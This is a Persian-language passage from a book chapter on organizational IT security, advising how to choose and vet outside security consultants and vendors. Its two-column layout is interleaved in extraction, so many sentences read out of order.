ﺁﻭﺭﺩ .ﺣﺘﻲ ﺍﮔﺮ ﻳﻚ ﺷﺮﻛﺖ ﺗﺄﻣﻴﻦ ﺍﻣﻨﻴﺖ ﺑﻴﺮﻭﻧﻲ ﺑﺴﻴﺎﺭ ﺍﻣﺎﻧﺘﺪﺍﺭ ﺷﺎﻳﺪ ﺧﻮﺩﺗﺎﻥ ﺑﺮﺍﻱ ﺍﻳﻨﻜﺎﺭ ﻛﺎﺭﺷﻨﺎﺳﺎﻧﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻭﻟﻲ ﻧﮕﺮﺍﻥ
ﻭ ﺷﺎﻳﺴﺘﻪ ﺑﺎﺷﺪ ،ﭼﻨﺎﻧﭽﻪ ﺷﻤﺎ ﺩﺭ ﺍﻧﺠﺎﻡ ﻛﺎﺭﻱ ﺑـﻪ ﺁﻧﻬـﺎ ﺍﻋﺘﻤـﺎﺩ ﺯﻣﺎﻥ ﻛﻢ ﻳﺎ ﺗﻮﺍﻧﺎﻳﻲ ﻭﺍﻛﻨﺶ ﻣﻨﺎﺳﺐ ﺁﻧﻬﺎ ﺑﻪ ﻳﻚ ﺑﺤﺮﺍﻥ ﺑﺎﺷﻴﺪ.
ﻛﻨﻴﺪ ﻭ ﺁﻥ ﻛﺎﺭ ﺑﺼﻮﺭﺕ ﻧﺎﻣﻄﻠﻮﺏ ﺍﻧﺠﺎﻡ ﺷﻮﺩ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﺗـﺎ
ﻣﺎﻫﻬﺎ ﺑﻌﺪ ﻛﻪ ﭘﻴﺎﻣـﺪﻫﺎﻱ ﺁﻥ ﺁﺷـﻜﺎﺭ ﺷـﻮﻧﺪ -ﺯﻣﺎﻧﻴﻜـﻪ ﺷـﺎﻳﺪ ﻱ ﻳﻚ ﺷﺮﻛﺖ ﺑﻪ ﺑﺎﺯﺍﺭ ﺑﺮﻭﻳـﺪ ﭘﺲ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﺮﺍﻱ ﺟﻠﺐ ﻫﻤﻜﺎﺭ ﹺ
ﺭﺍﺑﻄﺔ ﺷﻤﺎ ﺑﺎ ﺁﻥ ﺷﺮﻛﺖ ﭘﺎﻳﺎﻥ ﻳﺎﻓﺘﻪ ﺑﺎﺷﺪ -ﻣﺘﻮﺟﻪ ﺁﻥ ﺍﺷـﻜﺎﻝ ﺗﺎ ﭼﻨﺪ ﭘﻴﻤﺎﻧﻜﺎﺭ ﺭﺍ ﺑﺮﺍﻱ ﻫﻤﻜﺎﺭﻱ )ﺗﻤﺎﻡ ﻭﻗﺖ ﻭ ﻳﺎ ﭘـﺎﺭﻩ ﻭﻗـﺖ( ﺑـﻪ
ﻧﺸﻮﻳﺪ. ﺍﺩﺍﺭﺓ ﺷﻤﺎ ﺑﻔﺮﺳﺘﺪ .ﻫﻤﭽﻨﻴﻦ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺨﻮﺍﻫﻴـﺪ ﺍﺯ ﺧـﺪﻣﺎﺕ
ﺷﺮﻛﺘﻬﺎﻱ ﻧﻈﺎﺭﺕ ﻭ ﻭﺍﻛﻨﺶ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ ١٠٢ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ ﺗﺎ ﺗﻨﻬـﺎ
ﺑﻪ ﻫﻤﻴﻦ ﺩﻟﻴﻞ ﻭﻗﺘﻲ ﻳﻚ ﺷـﺮﻛﺖ ﺭﺍ ﺑـﺮﺍﻱ ﻫﻤﻜـﺎﺭﻱ ﺩﺭﻧﻈـﺮ ﺑﺮ ﺍﻣﻨﻴﺖ ﺷﻤﺎ ﻧﻈﺎﺭﺕ ﻛﻨﻨﺪ ﻭ ﺩﺭﺻﻮﺭﺕ ﺑﺮﻭﺯ ﺍﺷـﻜﺎﻝ ﺑـﻪ ﺷـﻤﺎ
ﻣﻲﮔﻴﺮﻳﺪ ﺑﺎﻳﺪ: ﻛﻤﻚ ﻧﻤﺎﻳﻨﺪ.
ﻣﻌﺮﻓﻬﺎ ﺭﺍ ﺑﺮﺭﺳﻲ ﻛﻨﻴﺪ ﺷﺎﻳﺪ ﻧﺘﻮﺍﻧﻴﺪ ﻳﻚ ﻛﺎﺭﻣﻨﺪ ﺗﻤﺎﻡ ﻭﻗﺖ ﺑﻜﺎﺭ ﺑﮕﻴﺮﻳﺪ ﻳـﺎ ﻧﻴـﺎﺯﻱ ﺑـﻪ
ﺑﺪﻧﺒﺎﻝ ﻣﻌﺮﻓﻬﺎﻱ ﺣﺮﻓﻪﺍﻱ ﺑﮕﺮﺩﻳﺪ ﻛﻪ ﺷـﺨﺺ ﻳـﺎ ﺳـﺎﺯﻣﺎﻧﻲ ﺭﺍ ﭼﻨﻴﻦ ﻛﺴﻲ ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷـﻴﺪ .ﺩﺭ ﺍﻳﻨـﺼﻮﺭﺕ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﻋﻘـﺪ
ﺑﻜﺎﺭ ﮔﺮﻓﺘﻪﺍﻧﺪ ﻛﻪ ﺧﺪﻣﺎﺗﻲ ﻣﺸﺎﺑﻪ ﺁﻧﭽﻪ ﺷﻤﺎ ﺑﺪﻧﺒﺎﻝ ﺁﻥ ﻫـﺴﺘﻴﺪ ﻗﺮﺍﺭﺩﺍﺩ ﺑﺎ ﻳﻚ ﺷﺮﻛﺖ ﻣـﺸﺎﻭﺭﻩ ﻭ ﻧﻈـﺎﺭﺕ ﻛـﻪ ﺩﺭ ﺍﻳـﻦ ﺯﻣﻴﻨـﻪ
ﺭﺍ ﺍﺭﺍﺋﻪ ﻣﻲﻛﻨﺪ. ﺧﺪﻣﺎﺕ ﻛﺎﻣﻞ ﺍﺭﺍﺋﻪ ﻣﻲﻛﻨﺪ ﻧﻴﺎﺯﺗﺎﻥ ﺭﺍ ﺑﺮﺁﻭﺭﺩﻩ ﻛﻨﺪ ﻭ ﻧﻴﺰ ﻣﻘﺮﻭﻥ
ﺑﻪ ﺻﺮﻓﻪﺗﺮ ﺑﺎﺷﺪ.
ﺍﻓﺮﺍﺩ ﺭﺍ ﺑﺮﺭﺳﻲ ﻛﻨﻴﺪ
ﻧﻜﺘﺔ ﻛﻠﻴﺪﻱ ﺩﺭ ﻫﺮﻳﻚ ﺍﺯ ﻣﻮﺍﺭﺩ ﻓـﻮﻕ ﺍﻳـﻦ ﺍﺳـﺖ ﻛـﻪ ﺑﺪﺍﻧﻴـﺪ
ﺍﮔﺮ ﺍﻓﺮﺍﺩ ﺧﺎﺻﻲ ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﻛﺎﺭﺗﺎﻥ ﺑﻪ ﺷﻤﺎ ﻣﻌﺮﻓﻲ ﺷﺪﻩﺍﻧﺪ ،ﺑـﺎ
ﻧﻴﺎﺯﻫﺎﻳﺘﺎﻥ ﭼﻴﺴﺖ ﻭ ﻫﺮﻳﻚ ﺍﺯ ﺁﻥ ﺧﺪﻣﺎﺕ ﺑﻪ ﻛﺪﺍﻡ ﻧﻴﺎﺯﻫﺎﻳﺘـﺎﻥ
ﺭﻭﺷﻬﺎﻳﻲ ﻛﻪ ﺩﺭ ﺍﺩﺍﻣﺔ ﻫﻤﻴﻦ ﻣﺒﺤﺚ ﻭ ﺩﺭ ﺑﺨﺶ "ﺍﻓـﺮﺍﺩ" ﺷـﺮﺡ
ﭘﺎﺳﺦ ﻣﻲﺩﻫﻨﺪ .ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﻫﻤﻴـﺸﻪ ﺳـﺎﺩﻩ ﻧﻴـﺴﺖ ،ﭼﺮﺍﻛـﻪ ﺗـﺎ
ﻣﻲ ﺩﻫﻴﻢ ﺁﻧﻬـﺎ ﺭﺍ ﺍﺭﺯﻳـﺎﺑﻲ ﻛﻨﻴـﺪ .ﺩﺭ ﻣـﻮﺭﺩ ﺷـﺮﻛﺘﻬﺎﻱ ﺑـﺰﺭﮒ
ﻭﻗﺘﻲ ﺗﺠﺮﺑﺔ ﻣﺴﺎﺋﻞ ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﭘﻴﺪﺍ ﻧﻜﺮﺩﻩ ﻭ ﻣﺤﻴﻂ ﺍﻃﺮﺍﻑ ﺧﻮﺩ
ﻣﺸﺎﻭﺭﻩﺍﻱ ﻛﻪ ﺍﺳﺎﻣﻲ ﺍﻓﺮﺍﺩ ﺩﺭﮔﻴﺮ ﺩﺭ ﭘﺮﻭﮊﺓ ﺷﻤﺎ ﺭﺍ ﺗﺎ ﭘﺮﺩﺍﺧـﺖ
ﺭﺍ ﺧﻮﺏ ﻧﺸﻨﺎﺧﺘﻪ ﺑﺎﺷﻴﺪ ،ﻧﻴﺎﺯﻫﺎﻱ ﻭﺍﻗﻌﻲ ﺧﻮﺩ ﺭﺍ ﻧﻤﻲﺩﺍﻧﻴﺪ.
ﻗﺴﻂ ﺍﻭﻝ ﻫﺰﻳﻨﺔ ﻗﺮﺍﺭﺩﺍﺩ ﺩﺭ ﺍﺧﺘﻴﺎﺭﺗﺎﻥ ﻗﺮﺍﺭ ﻧﻤﻲﺩﻫﻨﺪ ﻣﺤﺘﺎﻃﺎﻧﻪ
ﻋﻤﻞ ﻛﻨﻴﺪ. ﺍﻧﺘﺨﺎﺏ ﻓﺮﻭﺷﻨﺪﻩ
ﻣﻮﻓﻘﻴﺖ ﺷﻤﺎ ﺩﺭ ﺑﺮﻭﻧﺴﭙﺎﺭﻱ ﺍﻣﻮﺭ ﺍﻣﻨﻴﺘﻲ ﺑﻪ ﺷﺮﻛﺘﻬﺎﻱ ﺛﺎﻟﺚ ﺗـﺎ
ﭘﺎﻳﺪﺍﺭﻱ ﻭ ﺗﺪﺍﻡ ﻓﻌﺎﻟﻴﺖ ﺷﺮﻛﺖ ﺭﺍ ﺩﺭ ﻧﻈﺮ ﺑﮕﻴﺮﻳﺪ
ﺣﺪ ﺯﻳﺎﺩﻱ ﺑﻪ ﺳﺎﺯﻣﺎﻧﻬﺎ ﻳﺎ ﺍﻓﺮﺍﺩﻱ ﺑﺴﺘﮕﻲ ﺩﺍﺭﺩ ﻛﻪ ﺁﻧﻬﺎ ﺭﺍ ﺑـﺮﺍﻱ
ﺍﮔﺮ ﺷﻤﺎ ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﻳﻚ ﭘﺮﻭﮊﺓ ﺑﻠﻨﺪﻣﺪﺕ ﻗﺮﺍﺭﺩﺍﺩ ﺑﺴﺘﻪﺍﻳﺪ ﺑﺎﻳـﺪ
ﺍﻳﻨﻜﺎﺭ ﺍﻧﺘﺨﺎﺏ ﻛﺮﺩﻩﺍﻳﺪ.
ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﻛﻨﻴﺪ ﻛﻪ ﺷﺮﻛﺖ ﻃﺮﻑ ﻗﺮﺍﺭﺩﺍﺩ ﺩﺭ ﺗﻤﺎﻡ ﻣـﺪﺕ
ﻝ ﻗﺮﺍﺭﺩﺍﺩ ﻭﺟﻮﺩ ﺧﻮﺍﻫﺪ ﺩﺍﺷـﺖ .ﻣﻨﻈـﻮﺭ ﺍﺯ ﺍﻳـﻦ ﻧﻜﺘـﻪ ﺍﻳـﻦ ﻃﻮ ﹺ ﻳﻚ ﺭﺍﻫﻨﻤﺎ ﺑﮕﻴﺮﻳﺪ ﻭ ﺭﻭﻱ ﻣﻌﺮﻓﻬﺎ ﭘﺎﻓﺸﺎﺭﻱ ﻛﻨﻴﺪ
ﻧﻴــﺴﺖ ﻛــﻪ ﺷــﻤﺎ ﻧﺒﺎﻳــﺪ ﺑــﺎ ﺍﺳــﺘﻔﺎﺩﻩ ﺍﺯ ﺧــﺪﻣﺎﺕ ﺷــﺮﻛﺘﻬﺎﻱ
ﺗﺎﺯﻩﺗﺄﺳﻴﺲ ﻣﻮﺍﻓﻘﺖ ﻛﻨﻴﺪ ،ﺑﻠﻜﻪ ﺑﺎﻳﺪ ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﻛﻪ ﺳﺎﺯﻣﺎﻥ ﺑﻪ ﻋﻠﺖ ﺗﻨﻮﻉ ﺯﻳﺎﺩ ﺷﺮﻛﺘﻬﺎﻱ ﻣﺸﺎﻭﺭﻩ ،ﻳﻜﻲ ﺍﺯ ﺑﻬﺘﺮﻳﻦ ﺭﻭﺷﻬﺎﻱ
ﻣﺮﺑﻮﻃـﻪ ﻭﺍﺟــﺪ ﻣــﺪﻳﺮﻳﺖ ﻭ ﭘـﺸﺘﻮﺍﻧﺔ ﻣــﺎﻟﻲ ﻻﺯﻡ ﺑــﺮﺍﻱ ﺍﻧﺠــﺎﻡ ﺍﻧﺘﺨﺎﺏ ﺷﺮﻛﺖ ﻣﻮﺭﺩ ﻧﻈﺮﺗﺎﻥ ،ﭘﺮﺳﻴﺪﻥ ﺍﺯ ﻳﻚ ﺳﺎﺯﻣﺎﻥ ﺁﺷـﻨﺎ ﻭ
ﺗﻌﻬﺪﺍﺗﺶ ﻣﻲﺑﺎﺷﺪ .ﺍﺯ ﺷﺮﻛﺘﻬﺎﻱ ﻣﺸﺎﻭﺭﻩﺍﻱ ﻛﻪ ﺩﺍﺭﺍﻱ ﻧﺮﺧﻬﺎﻱ ﻣﺸﺎﺑﻪ ﺳﺎﺯﻣﺎﻥ ﺧﻮﺩﺗﺎﻥ ﻣﻲ ﺑﺎﺷﺪ .ﻣﺘﺄﺳﻔﺎﻧﻪ ﻫﻤﻴﺸﻪ ﭘﻴﺪﺍ ﻛـﺮﺩﻥ
ﭘﺎﺋﻴﻦ ﻫﺴﺘﻨﺪ ﺍﺟﺘﻨـﺎﺏ ﻛﻨﻴـﺪ؛ ﭼﺮﺍﻛـﻪ ﺍﮔـﺮ ﻧﺘﻮﺍﻧﻨـﺪ ﺑـﺎ ﻓـﺮﻭﺵ ﻳﻚ ﻣﻌﺮﻑ ﺧﻮﺏ ﺍﻣﻜﺎﻧﭙﺬﻳﺮ ﻧﻴـﺴﺖ .ﺑـﺴﻴﺎﺭﻱ ﺍﺯ ﺳـﺎﺯﻣﺎﻧﻬﺎ ،ﻳـﺎ
ﺧﺪﻣﺎﺗﻲ ﻛﻪ ﺷﻤﺎ ﺍﺯ ﺁﻧﻬﺎ ﻣﻲﺧﺮﻳﺪ ﻫﺰﻳﻨـﻪﻫـﺎﻱ ﺧـﻮﺩ ﺭﺍ ﺗـﺄﻣﻴﻦ ﺷﺮﻛﺘﻬﺎﻱ ﻣﺸﺎﻭﺭﻩ ﺍﻱ ﺧﻮﺩ ﺭﺍ ﺩﺭ ﻳﻚ ﻧﻤﺎﻳـﺸﮕﺎﻩ ﺗﺠـﺎﺭﻱ ﭘﻴـﺪﺍ
ﻛﻨﻨﺪ ،ﺁﻧﮕﺎﻩ ﺳﻌﻲ ﺧﻮﺍﻫﻨﺪ ﻛﺮﺩ ﺍﺯ ﺟﺎﻱ ﺩﻳﮕﺮ ﺍﻳﻦ ﭘﻮﻝ ﺭﺍ ﺑﺪﺳﺖ
102 Remote Monitoring and Response Firm
١٦٩ ﺑﺨﺶ ﺳﻮﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ
ﻗﺎﻧﻮﻥ ﻛﺎﺭ ﻭ ﺁﻧﺪﺳﺘﻪ ﺍﺯ ﻣﺴﺎﺋﻞ ﻣﺪﻳﺮﻳﺘﻲ ﻛـﻪ ﺷـﺮﺍﻳﻄﻲ ﺭﺍ • ﺁﻭﺭﻧﺪ ﻭ ﻟﺬﺍ ﺧﺪﻣﺎﺕ ﻫﺮﭼﻨﺪ ﺳﻄﺢ ﺑﺎﻻﻱ ﺁﻧﻬﺎ ﺩﺭ ﺟـﺎﻱ ﺩﻳﮕـﺮ ﻭ
ﭘﻴﺶ ﺑﻴﻨﻲ ﻣﻲﻛﻨﻨﺪ ﻛﻪ ﺩﺭ ﺁﻧﻬـﺎ ﺍﻓـﺮﺍﺩ ﺩﺍﺧﻠـﻲ ﺑـﺮ ﻋﻠﻴـﻪ ﺷﺎﻳﺪ ﺣﺘﻲ ﺗﺠﺎﺭﺕ ﺩﻳﮕﺮﻱ ﻣﺘﻤﺮﻛﺰ ﺧﻮﺍﻫﺪ ﺷﺪ.
ﻛﺎﺭﻓﺮﻣﺎﻳﺸﺎﻥ ﺍﻗﺪﺍﻡ ﻗﺎﻧﻮﻧﻲ ﻣﻲﻛﻨﻨﺪ؛
ﻣﺮﺍﻗﺐ ﻓﺮﻳﺒﻜﺎﺭﻳﻬﺎ ﺑﺎﺷﻴﺪ
ﻗﻮﺍﻧﻴﻦ ﺟﺮﺍﺋﻢ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻣﻠﻲ ﻭ ﻣﺤﻠﻲ؛ • ١٠٣
ﺩﺭ ﻣﻮﺭﺩ ﻗﺮﺍﺭﺩﺍﺩﻫﺎﻱ ﻫﻤﻪﺟﺎﻧﺒﻪ ﻛﻪ ﺩﺭ ﺁﻥ ﻳـﻚ ﺷـﺮﻛﺖ ﺑـﻪ
ﻣﺤﺼﻮﻻﺕ ،ﻓﻨﺎﻭﺭﻳﻬﺎ ﻭ ﻣﺤﺪﻭﺩﻳﺘﻬﺎﻱ ﺭﻣﺰﻧﮕﺎﺭﻱ؛ • ﺗﻨﻬﺎﻳﻲ ﻫﻤـﺔ ﺳﻴﺎﺳـﺘﻬﺎ ﺭﺍ ﺗﻬﻴـﻪ ﻧﻤـﻮﺩﻩ ﻭ ﺑـﺮﺍﻱ ﭘﻴـﺎﺩﻩﺳـﺎﺯﻱ
ﻭﻳﺮﻭﺳﻬﺎ ،ﻛﺮﻣﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ،ﺳﺎﻳﺮ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﺨـﺮﺏ، • ﺳﻴﺎﺳﺘﻬﺎ ،ﺧﺪﻣﺎﺕ ﻭ ﺳﺨﺖﺍﻓﺰﺍﺭ ﻻﺯﻡ ﺭﺍ ﻧﻴﺰ ﻣﻲﻓﺮﻭﺷـﺪ ﻣﺮﺍﻗـﺐ
ﻭ ﻫﻤﭽﻨﻴﻦ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﭘﻮﻳﻨﺪﻩ١٠٤؛ ﺑﺎﺷﻴﺪ .ﻣﺎ ﮔﺰﺍﺭﺷـﺎﺗﻲ ﺩﺭﻳﺎﻓـﺖ ﻛـﺮﺩﻩﺍﻳـﻢ ﻛـﻪ ﺩﺭ ﺁﻥ ﻧﻴﺎﺯﻫـﺎﻱ
ﺳﻴﺎﺳﺖ ﺍﻣﻨﻴﺘﻲ ﻭ ﻧﻴﺎﺯﻫﺎﻱ ﻃﺮﺡ ﺍﻣﻨﻴﺘﻲ ﺑﻪ ﻃﺮﺯ ﻣﺸﻜﻮﻛﻲ ﺑﺮﺍﻱ
ﻲ ﻣﺠــﺎﺯﻱ
ﺍﺻــﻮﻝ TCP/IPﺩﺭ ﺷــﺒﻜﻪﻫــﺎﻱ ﺧــﺼﻮﺻ ﹺ •
١٠٥
ﻫﻤﺔ ﻣـﺸﺘﺮﻳﺎﻥ ﺑـﺴﻴﺎﺭ ﻣـﺸﺎﺑﻪ ﻳﻜـﺪﻳﮕﺮ ﺑـﻮﺩﻩ ﻭ ﺩﺭ ﻫﻤﮕـﻲ ﺍﺯ
ﻭ ﺩﻳﻮﺍﺭﻩﻫﺎﻱ ﺁﺗﺶ؛ )(VPNs
ﻱ ﻧﺴﺒﺘﹰﺎ ﻣﺸﺎﺑﻬﻲ ﺍﺳﺘﻔﺎﺩﻩ
ﺳﺨﺖ ﺍﻓﺰﺍﺭ ﭘﺎﻳﻪ ﻭ ﺭﺍﻩﺣﻠﻬﺎﻱ ﻣﺸﺎﻭﺭﻩﺍ ﹺ
ﺁﻣﻮﺯﺵ ﻭ ﺁﮔﺎﻫﻲ ﻋﻤﻮﻣﻲ ،ﺭﺍﻫﻨﻤﺎﻫﺎ ﻭ ﺧﺪﻣﺎﺕ؛ • ﺷﺪﻩ ﺑﻮﺩ .ﺍﮔﺮ ﺷﻤﺎ ﺷﺮﻛﺘﻲ ﺭﺍ ﺍﻧﺘﺨﺎﺏ ﻛﻨﻴﺪ ﻛﻪ ﺷﻤﺎ ﺭﺍ ﻣﺤـﺪﻭﺩ
ﺑﻪ ﺍﺭﺗﺒﺎﻁ ﺍﻧﺤﺼﺎﺭﻱ ﺑﻠﻨﺪﻣـﺪﺕ ﺑـﺎ ﺧـﻮﺩ ﻧﻜﻨـﺪ ،ﺁﻧﮕـﺎﻩ ﺍﺣﺘﻤـﺎﻝ
ﻭﺍﻛﻨﺶ ﺑﻪ ﺭﺧﺪﺍﺩﻫﺎ ﻭ ﭘﻴﮕﺮﺩﻫﺎﻱ ﻗﺎﻧﻮﻧﻲ؛ •
ﺑﻴﺸﺘﺮﻱ ﻭﺟﻮﺩ ﺧﻮﺍﻫﺪ ﺩﺍﺷﺖ ﻛﻪ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺗﺪﻭﻳﻦﺷﺪﻩ ﺗﻮﺳـﻂ
ﺑﺨﺶ ﺳﻮﻡ
ﺍﻣﻨﻴﺖ ﺳﺨﺖﺍﻓﺰﺍﺭﻱ ﻭ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ؛ ﻭ • ﺁﻥ ﺳﺎﺯﻣﺎﻥ ﻣﻄﺎﺑﻖ ﻧﻴﺎﺯﻫﺎﻱ ﻭﺍﻗﻌـﻲ ﺷـﻤﺎ ﺑﺎﺷـﺪ ﻭ ﻧـﻪ ﻣﻄـﺎﺑﻖ
ﺍﻟﮕﻮﻫﺎﻱ ﺳﺮﺁﻣﺪﻱ ،ﺭﻭﺷﻬﺎﻱ ﺭﺳﻤﻲ ﺍﺭﺯﻳﺎﺑﻲ ﻣﺨـﺎﻃﺮﻩ ،ﻭ • ﻭﺳﺎﻳﻠﻲ ﻛﻪ ﺁﻧﻬﺎ ﺑﻪ ﻓﺮﻭﺵ ﻣﻲﺭﺳﺎﻧﻨﺪ.
ﻣﺴﺎﺋﻞ ﻣﺮﺑﻮﻁ ﺑﻪ ﺍﻣﻮﺭ ﺑﻴﻤﻪ.
ﻫﺮ ﺷﺮﻛﺖ ﺧﺪﻣﺎﺕ ﻣﺸﺎﻭﺭﻩ ﺍﻱ ﻛﻪ ﺑﺨﻮﺍﻫﺪ ﺳﻴﺎﺳـﺘﻬﺎﻱ ﺧـﻮﺑﻲ ﮔﺴﺘﺮﺩﮔﻲ ﺗﺠﺎﺭﺏ ﺭﺍ ﺩﺭﻧﻈﺮ ﺑﮕﻴﺮﻳﺪ
ﺑﺮﺍﻱ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻃﺮﻑ ﻗﺮﺍﺭﺩﺍﺩ ﺗﻬﻴﻪ ﻛﻨﺪ ﺑﺎﻳﺪ ﭘﺮﺳـﻨﻠﻲ ﺩﺍﺷـﺘﻪ ﺷﻤﺎ ﺑﺎﻳﺪ ﺣﺘﻲﺍﻻﻣﻜﺎﻥ ﺍﺯ ﺍﻧﺘﺨﺎﺏ ﺷﺮﻛﺘﻬﺎﻳﻲ ﻛﻪ ﻋﻤﺪﺓ ﺗﺠﺮﺑـﻪ
ﺑﺎﺷﺪ ﻛﻪ ﻃﺎﻟﺐ ﮔﻔﺘﮕﻮ ﺩﺭﺑﺎﺭﺓ ﻣﺒﺎﺣﺚ ﻣﺨﺘﻠﻒ ﻛﻪ ﺩﺭ ﺍﻳﻦ ﻛﺘﺎﺏ ﺁﻧﻬﺎ ﻣﺮﺑﻮﻁ ﻳﻚ ﻧﻮﻉ ﻣﺸﺘﺮﻱ ﻳﺎ ﻳﻚ ﺑﺴﺘﺮ ﻧـﺮﻡﺍﻓـﺰﺍﺭﻱ ﺧـﺎﺹ
ﻭ ﺑﻮﻳﮋﻩ ﺩﺭ ﺍﻳﻦ ﻓﺼﻞ ﺑﻪ ﺁﻥ ﻣﻲﭘﺮﺩﺍﺯﻳﻢ ﺑﺎﺷﻨﺪ .ﺍﮔﺮ ﺁﻧﻬﺎ ﺁﻣﺎﺩﻩ ﻭ ﺍﺳﺖ ﻣﺤﺘﺎﻃﺎﻧﻪ ﻋﻤﻞ ﻛﻨﻴﺪ ،ﻣﮕﺮ ﺁﻧﻜﻪ ﻧﻴﺎﺯﻫـﺎﻱ ﺳـﺎﺯﻣﺎﻥ ﺷـﻤﺎ
ﻳﺎ ﻗﺎﺩﺭ ﺑﻪ ﺑﺤﺚ ﺩﺭ ﻣﻮﺭﺩ ﺍﻳـﻦ ﻋﻨـﺎﻭﻳﻦ ﻧﺒﺎﺷـﻨﺪ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﺩﻗﻴﻘﹰﺎ ﺑﺎ ﺳﺎﺯﻣﺎﻧﻬﺎﻳﻲ ﻛﻪ ﺷﺮﻛﺖ ﻣﺰﺑﻮﺭ ﺑـﻪ ﺁﻧﻬـﺎ ﺍﺭﺍﺋـﻪ ﺧـﺪﻣﺎﺕ
ﺍﻧﺘﺨﺎﺏ ﻣﻨﺎﺳﺒﻲ ﺑﺮﺍﻱ ﺍﺭﺍﺋﻪ ﺧﺪﻣﺎﺕ ﻧﺒﺎﺷﻨﺪ. ﻣﻲﺩﻫﺪ ﻣﻄﺎﺑﻘـﺖ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﺪ .ﺑﻌﻨـﻮﺍﻥ ﻣﺜـﺎﻝ ﻳـﻚ ﺷـﺮﻛﺖ
ﻣﺸﺎﻭﺭﻩﺍﻱ ﻛﻪ ﺍﺳﺎﺳﹰﺎ ﺧﺪﻣﺎﺕ ﺍﻣﻨﻴﺘﻲ ﺷﺨﺺ ﺛﺎﻟﺚ ﺭﺍ ﺑﻪ ﺍﺩﺍﺭﺍﺕ
ﺍﮔﺮ ﺩﺭ ﻣﻮﺭﺩ ﺍﻳﻦ ﺷﺮﻛﺘﻬﺎ ﻧﮕﺮﺍﻧﻲ ﺧﺎﺻﻲ ﺩﺍﺭﻳﺪ ﻛﺎﻓﻴﺴﺖ ﺍﺯ ﺁﻧﻬﺎ ﭘﻠﻴﺲ ﺍﺭﺍﺋﻪ ﻣﻲﺩﻫﺪ ﻛﻪ ﺍﺯ ﺳﻴـﺴﺘﻢ Microsoft Windows
ﺑﺨﻮﺍﻫﻴﺪ ﻛﻪ ﺳﻴﺎﺳﺘﻬﺎ ﻳﺎ ﺭﻭﺍﻟﻬﺎﻳﻲ ﻛﻪ ﺑﺮﺍﻱ ﻳﻚ ﻣﺸﺘﺮﻱ ﺩﻳﮕـﺮ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺮﺍﻱ ﻳﻚ ﺷـﺮﻛﺖ ﺩﺍﺭﻭﻳـﻲ ﻛـﻪ
ﺗﻬﻴﻪ ﻛﺮﺩﻩﺍﻧﺪ ﺭﺍ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﺷﻤﺎ ﻗـﺮﺍﺭ ﺩﻫﻨـﺪ .ﺑﺮﺧـﻲ ﺍﺯ ﺷـﺮﻛﺘﻬﺎ ﺗﺮﻛﻴﺒــﻲ ﺍﺯ Windowsﻭ Unixﺭﺍ ﺑﻜــﺎﺭ ﮔﺮﻓﺘــﻪ ﺍﻧﺘﺨــﺎﺏ
ﭼﻨﻴﻦ ﺳﻨﺪﻱ ﺭﺍ ﺑﻌﺪ ﺍﺯ ﺣﺬﻑ ﺍﺳﻢ ﻭ ﻣﺸﺨﺼﺎﺕ ﻣﺸﺘﺮﻱ ﺑﻪ ﺷﻤﺎ ﻣﻨﺎﺳﺒﻲ ﻧﺒﺎﺷﺪ .ﮔﺴﺘﺮﺓ ﺗﺠﺎﺭﺏ ﺷﺮﻛﺖ ﻣﺸﺎﻭﺭﻩﺍﻱ ﻣﻤﻜﻦ ﺍﺳـﺖ
ﺍﺭﺍﺋﻪ ﻣﻲﺩﻫﻨﺪ .ﺳﺎﻳﺮ ﺷﺮﻛﺘﻬﺎ ﻣﻤﻜﻦ ﺍﺳـﺖ ﻣـﺸﺘﺮﻳﻬﺎﻳﻲ ﺩﺍﺷـﺘﻪ ﺁﻧﻘﺪﺭ ﻓﺮﺍﮔﻴﺮ ﻧﺒﺎﺷﺪ ﻛﻪ ﺑﺘﻮﺍﻧﺪ ﺧﺪﻣﺎﺕ ﺳﻴﺎﺳﺘﻲ ﻣﻨﺎﺳـﺒﻲ ﺑـﺮﺍﻱ
ﺑﺎﺷﻨﺪ ﻛﻪ ﺧﻮﺩﺷﺎﻥ ﺧﻮﺍﺳﺘﻪ ﺑﺎﺷﻨﺪ ﺩﺭ ﻓﻬﺮﺳﺖ "ﻣﺸﺘﺮﻳﺎﻥ ﻣﺮﺟﻊ" ﭘﺎﺳﺨﮕﻮﻳﻲ ﺑﻪ ﻧﻴﺎﺯﻫﺎﻱ ﻣﺤﻴﻂ ﻛﺎﺭﻱ ﺷﻤﺎ ﺍﺭﺍﺋﻪ ﺩﻫﺪ .ﺍﻳﻦ ﻧﻜﺘﻪ
